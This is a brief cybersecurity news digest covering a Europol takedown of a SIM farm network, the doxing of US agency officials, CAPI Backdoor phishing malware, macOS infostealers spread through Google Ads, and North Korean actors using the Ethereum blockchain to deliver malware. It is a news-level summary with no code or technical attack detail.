Major Incidents or Breaches

  • Europol dismantled a cybercrime-as-a-service SIM farm network responsible for powering 49 million fake accounts globally. The operation enabled clients to conduct a range of criminal activities, including fraud and phishing, by automating account creation and abuse.

  • Hackers published personal information (“doxed”) of officials from US agencies including ICE, DHS, DOJ, and FBI. The same incident exposed details of a secret FBI anti-ransomware task force.

Newly Discovered Vulnerabilities

  • Security researchers identified a new .NET-based malware, dubbed CAPI Backdoor, distributed via phishing ZIP files. The campaign has targeted Russian automobile and e-commerce companies.

Notable Threat Actor Activity

  • A new campaign is delivering infostealing malware such as AMOS (Atomic macOS Stealer) and Odyssey to macOS users. Attackers are leveraging Google Ads to distribute fake versions of popular platforms including Homebrew, LogMeIn, and TradingView, specifically targeting macOS developers.

  • North Korean threat actors have been detected hiding malware within the Ethereum blockchain, using it as a covert delivery channel.

Trends, Tools, or Tactics of Interest

  • The use of cybercrime-as-a-service (CaaS) infrastructures, such as large-scale SIM farms, continues to facilitate mass account fraud and related cybercrime.

  • Increased use of malvertising via search engines, specifically Google Ads, to distribute infostealers targeting macOS platforms and software supply chain stakeholders.

  • Threat actors are exploiting blockchain technology as an alternative channel for malware delivery to evade traditional detection mechanisms.